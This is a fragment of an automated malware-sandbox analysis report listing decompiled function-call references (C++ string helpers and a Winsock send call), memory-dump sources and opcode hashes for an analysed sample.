                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                                • String ID: [INFO]
                                                • API String ID: 868658090-4019176272
                                                • Opcode ID: d4748d1cf223dc65867f475122c413e2bc6232920193d0c3f3ac1a027aeefcc1
                                                • Instruction ID: 4a8750b78b6402e6d0e43a4049bcdd65855c6e5bd4c2de757a553f2e6024edcb
                                                • Opcode Fuzzy Hash: d4748d1cf223dc65867f475122c413e2bc6232920193d0c3f3ac1a027aeefcc1
                                                • Instruction Fuzzy Hash: 38D0123A500118BBCB007FB9EC098D97B28EB05765B40C465FD0587261EA36D62097D5